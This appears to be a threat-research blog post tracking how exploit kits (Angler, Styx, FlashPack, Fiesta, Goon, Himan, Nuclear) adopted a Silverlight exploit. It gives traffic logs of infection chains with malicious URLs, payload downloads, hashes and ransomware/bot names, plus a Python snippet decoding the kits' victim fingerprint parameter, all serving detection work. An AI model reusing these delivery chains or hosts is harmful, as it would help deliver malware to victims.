2013-11-13 - Exploit Integration
CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits
Angler EK is definitely on the move. It's not a huge surprise, as we can speculate that the team behind it is the same one that was first using Cool EK (a Paunch VIP customer) and is behind the Reveton threat.
After integrating CVE-2013-0634 last week:
Angler EK's first move on 2013-11-05. Spotted by @node5 and @EKWatcher : CVE-2013-0634. Confirmed by @timohirvonen pic.twitter.com/HOvpqhW0qm
— kafeine (@kafeine) November 7, 2013
EKWatcher spotted a new change today: the Silverlight check has now been activated and delivers an exploit.
Looks like "Angler EK" is including a Silverlight Exploit - in preference to ones for vulnerable Flash and Java
— Chris Wakelin (@EKwatcher) November 13, 2013
Pedro Marinho from Emerging Threats pointed out links with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure.
(Right now I don't understand why CVE-2013-3896 is mentioned here. Will update if I learn about it.)
<edit: 2013-11-26> So CVE-2013-3896 is used to bypass ASLR (cf. post from Yuki Chen - TrendMicro). </edit>
CVE-2013-0074/3896 pass in Angler EK :
CVE-2013-0074 successful pass in Angler EK 2013-11-13 |
Silverlight 5.1.10411.0 Addon In IE used in that pass |
Note: I made a pass with Silverlight 5.1.20513.0; as the fire condition told us, it is safe.
GET http://peragretisque.yevgenimalkin .com/leoccvkead
200 OK (text/html)
Silverlight version checks Angler EK 2013-11-13 |
Deciding if Silverlight must be fired : "sterlings" in Angler - 2013-11-13 |
Call for Silverlight Exploit in Angler 2013-11-13 |
200 OK (text/html)
Silverlight Call |
Content of that zip |
Dll TimeStamp |
The DLL ( 5f36a4c019d559f1be9fdd0cd770be2e ) would be worth some work but, as often, I do not have the knowledge right now to provide useful data. I will link any analysis that may come.
GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
200 OK (application/octet-stream) Xored Reveton Ransomware.
One of the US Reveton Design 2013-11-13 |
Silverlight 5.1.10411.0 Addon In Firefox 17 |
Firefox Warning on Silverlight call from Angler EK 2013-11-13 |
Silverlight 5.1.10411.0 - Firefox 17 Angler EK 2013-11-13 |
@kafeine @EKwatcher It makes sense that it's PacketStore exploit, as that is 0074 combined with a mem disclosure and it's open source
— James Forshaw (@tiraniddo) November 19, 2013
Files:
Here is a Pcap (courtesy of Will Metcalf from Emerging Threats).
Here is a Fiddler.
Styx Kein : (2013-11-19)
Have been told it was there (Thanks !)
CVE-2013-0074 positive pass in Styx Kein 2013-11-19 (payload taken from Angler EK...or more likely from here :/ ) |
302 Moved Temporarily to http://www1.gh1pn3avb63m2.4pu.com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW
GET http://www1.gh1pn3avb63m2.4pu .com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW
200 OK (text/html)
GET http://www1.gh1pn3avb63m2.4pu .com/nnnnvdd.html
200 OK (text/html)
Once decoded: this is the Java detection that will choose which CVE to fire based on your version. Should be: jorg.html should be CVE-2013-0431 or CVE-2013-0422; jvvn.html should be CVE-2013-2465; jply.html could be CVE-2013-2472 + click-to-play bypass if it's the same as in Styx. If Java does not fire... then let's check PDF! |
GET http://www1.gh1pn3avb63m2.4pu .com/pdfx.html
200 OK (text/html)
GET http://www1.gh1pn3avb63m2.4pu .com/qopne.html
200 OK (text/html)
Once decoded: we can see the conditions to fire CVE-2011-3402 (fnts.html), then some checks to fire CVE-2010-0188 (PDF). And after the PDF conditions, two bullets are fired: CVE-2013-2551 (iexp.html) and CVE-2013-0074 (Silverlight). |
GET http://www1.gh1pn3avb63m2.4pu .com/iexp.html
200 OK (text/html) Call for CVE-2013-2551
GET http://www1.gh1pn3avb63m2.4pu .com/retn.html
200 OK (text/html) Call for Call (sic) for CVE-2013-0074
Call for s.html |
GET http://www1.gh1pn3avb63m2.4pu .com/hdht.html
200 OK (text/html) CVE-2013-2551
GET http://www1.gh1pn3avb63m2.4pu .com/s.html
200 OK (text/html)
Call for Silverlight Exploit (and preparation of Variable to give to the Exploit - note xlkey = 1) |
GET http://www1.gh1pn3avb63m2.4pu .com/zip.eot
200 OK (application/vnd.ms-fontobject) cb9f864eb3b63172d01f9f45d849cc15
Contains :
Content of the Silverlight Call Rip from Angler EK (or more likely from this blog... :/ ) |
GET http://www1.gh1pn3avb63m2.4pu .com/1a8aqgdg7qedig.eot
200 OK (application/vnd.ms-fontobject) (note the 14 character Angler-ish pattern :) ) dc7647bc7896912b0fea4b93815e7fd0
This is the actual payload of the exploit. It's in fact a loader that will grab the real objective: Simda.
GET http://www2.h-qo05lqa59ljh7.wpbh .org/?aptlxbvy=hdPh0LXH7t6OotrTbWado5hsX%2BDe1HTDodiiqJKpq6BloZWkqKmilG1tpKKhcJKnmtjrn6epmGWX0JKX3q6ziYSS2tGbnqOa35w%3D&h=71
200 OK (application/octet-stream) 77cafd814d93ed7154676744fcf7ae75 Simda (Podmena Affiliate payload)
Want to know more about Styx Kein ? Read Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto) 2013-11-12
Files: Payload, decoded js and Fiddler (Owncloud via goo.gl)
FlashPack : 2013-12-06 (child of SafePack/CritXPack/Vintage Pack)
As Spotted by Eoin Miller the Silverlight Exploit is now in FlashPack.
(I will only skim over this one.)
CVE-2013-0074/3896 Successful pass in FlashPack 2013-12-06 |
GET http://besexeweryopko .com/cosmik/hkmh90B4.php
200 OK (text/html)
GET http://besexeweryopko .com/cosmik/capuro/da7c6b38522017d83733eac7775c7dbe.js
200 OK (application/javascript)
GET http://besexeweryopko .com/cosmik/silver.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html)
Here, the id parameter converted from hex to text gives you:
10.1.0.0|0.0.0.0|11.6.602.180|5.1.10411.0|Windows 7|MSIE 10
which are, respectively:
Adobe Reader, Java, Flash, Silverlight, OS and browser version.
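The hex-encoded id parameter above is a plain plugin fingerprint, which makes it easy to recover from proxy logs and pcap on the defender's side. The following is an added example, not code from the post or from any of the kits it describes: it hex-decodes the id value from the silver.php request shown above, maps the six fields to the names the post gives them, and flags whether the reported Silverlight build is one the post observed being exploited. The SAFE_SILVERLIGHT threshold is an assumption taken from the post's own observations (5.1.10411.0 exploited, 5.1.20513.0 safe), not the exact patched build number; the sample URL is the post's request with the defanging space removed.

```python
import binascii
from urllib.parse import parse_qs, urlsplit

# Field order as the post explains it: Adobe Reader, Java, Flash, Silverlight, OS, browser.
FIELDS = ("adobe_reader", "java", "flash", "silverlight", "os", "browser")

# Constructed for this example from the FlashPack request shown in the post
# (the " .com" defanging space has been removed so the URL parses).
SAMPLE_URL = (
    "http://besexeweryopko.com/cosmik/silver.php?id="
    "31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c"
    "352e312e31303431312e307c57696e646f777320377c4d534945203130"
)

# Assumption: the post saw 5.1.10411.0 exploited and 5.1.20513.0 safe, so any build
# at or above the safe one is treated as patched here. Replace with the vendor's
# patched build if you need an exact boundary.
SAFE_SILVERLIGHT = (5, 1, 20513, 0)


def decode_fingerprint(url):
    """Return the six plugin/OS/browser fields carried in the hex 'id' parameter."""
    query = parse_qs(urlsplit(url).query)
    hex_id = query.get("id", [""])[0]
    raw = binascii.unhexlify(hex_id).decode("ascii")
    parts = raw.split("|")
    if len(parts) != len(FIELDS):
        raise ValueError("unexpected field count in id parameter: %d" % len(parts))
    return dict(zip(FIELDS, parts))


def version_tuple(version):
    """'5.1.10411.0' -> (5, 1, 10411, 0) so versions compare numerically, not lexically."""
    return tuple(int(x) for x in version.split("."))


def silverlight_exploitable(fingerprint):
    """True when the victim reports a Silverlight build below the assumed safe one."""
    version = fingerprint["silverlight"]
    if version == "0.0.0.0":
        return False  # the kit uses 0.0.0.0 for an absent plugin (see the Java field above)
    return version_tuple(version) < SAFE_SILVERLIGHT


if __name__ == "__main__":
    fp = decode_fingerprint(SAMPLE_URL)
    for name in FIELDS:
        print("%-13s %s" % (name, fp[name]))
    print("silverlight exploitable:", silverlight_exploitable(fp))
```

Running it on the sample prints the same six values the post lists and reports the 5.1.10411.0 build as exploitable; point decode_fingerprint at silver.php or msie.php requests pulled from a proxy log to see which victims the kit considered worth a Silverlight attempt.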
silver.php |
GET http://besexeweryopko .com/cosmik/msie.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html) <- CVE-2013-2551
GET http://besexeweryopko .com/cosmik/capuro/def6f322082144f16a8450c1d0051eeb.eot
200 OK (text/plain)
Content of the "eot" |
TimeStamp : 2013-12-04 16:35:38
GET http://besexeweryopko .com/cosmik/capuro/fa6030784e2d535687f8c94b210dfb65.eot
200 OK (text/plain)
2nd "eot" (seems to contain parameters). |
GET http://besexeweryopko .com/cosmik/loadsilver.php
200 OK (application/octet-stream) b61b986194de5fef36d805923a0f9379 (Zaccess)
Fiddler : Here
Fiesta : 2014-01-03 (integration around 2013-12-28)
Thanks Nathan Fowler for Referer!
As spotted yesterday by Will Metcalf from Emerging Threats
CVE-2013-0074/3896 successful pass in Fiesta 2014-01-03 |
301 Moved Permanently to http://img.hitres.in/uiwtv07/?2 (note : you won't see this pattern in all Fiesta pass)
GET http://img.hitres .in/uiwtv07/?2
200 OK (text/html)
GET http://img.hitres .in/uiwtv07/?25ea404b5396cf485b50095a060b065102015c500f045652090057020200065406
200 OK (text/html) CVE-2013-2551 try
GET http://img.hitres .in/uiwtv07/?6ec285af089912d6450915090a0e535506515a03030103560d5051510e05535002;5110411
200 OK (application/x-silverlight-app) (Note the Silverlight Version in the call) ce056895e07d2a9d04c5e8db844013ea
GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6
200 OK (application/octet-stream) bdcfe33dbc7f86b929ddfbfa7a4ce43d which is Miuref.A (MS name) dropping : 71af22a63b970e0ec14e17497a33ba43 Miuref. (If anyone has worked on it, I'd love to know what this stuff is about, as it's becoming widespread.)
GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6;1
200 OK (text/html)
Files : Fiddler, Payloads
Goon/Redkit2: ~2014-01-22
Seems after days of failed attempts GoonEK finally got Silverlight CVE-2013-0074 Exploit working. Neutrino rip-off pic.twitter.com/R18AO7Rh3K
— William Metcalf (@node5) January 22, 2014
Pcap of the infection provided by Will Metcalf. Thanks !
Successful path in Goon on 2014-01-22, then Kelihos spambot loading Simda and Kelihos bot |
GET http://disabilitybenefitsinsider .com/home/au/link/xmlupdater.html
200 OK (text/html)
end of CVE-2013-2551 and Silverlight call |
Shellcode as Parameter |
GET http://disabilitybenefitsinsider .com/FFE.xap
200 OK (application/x-silverlight-app) 167a0ffcfb6d828f5090b58d0b3c6b30
Xap contains |
Nicely handled by dotpeek :
Silverlight.dll in dotpeek. |
GET http://disabilitybenefitsinsider .com/68283080.mp3
200 OK (application/x-msdownload)
Himan : 2014-01-23 (quite surely earlier; this is the date it was spotted)
Silverlight CVE-2013-0074/3896 positive path in Himan 2014-01-23 |
200 OK (text/html)
GET http://jvdsdveee .pw/po/yt.js
200 OK (application/x-javascript)
POST http://jvdsdveee .pw/index.php
200 OK (text/html)
GET http://jvdsdveee .pw/resirypenxuvore/xie.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-2551
GET http://jvdsdveee .pw/resirypenxuvore/fla.php?wq=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-0634
GET http://jvdsdveee .pw/resirypenxuvore/xe.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) Silverlight Exploit Call
Silverlight Exploit call in HiMan 2014-01-23 http://pastebin.com/q4a0ayzd |
GET http://jvdsdveee .pw/resirypenxuvore/d.php?hgfc=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (application/pdf)
GET http://jvdsdveee .pw/resirypenxuvore/1.zip
200 OK (application/zip) ce056895e07d2a9d04c5e8db844013ea cf. Fiesta: the exact same sample.
GET http://jvdsdveee .pw/resirypenxuvore/tx.exe
200 OK (application/octet-stream) (Ransomware 7043831f829fd8305a59cc6df09cc8b6 )
GET http://jvdsdveee .pw/resirypenxuvore/b.jar
200 OK (application/java-archive)
Nuclear Pack : 2014-09-12
Spotted by Brad
See here : 2014-09-12 - NUCLEAR EK SENDS SILVERLIGHT EXPLOIT
Post Publication Reading :
A Look At A Silverlight Exploit - Yuki Chen - TrendMicro 2013-11-25
Read More :
Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure Authored by Vitaliy Toropov
CVE-2013-0074 NIST
Lua Script by Emerging Threats to detect the exploitation in Suricata (can also be run from Command line)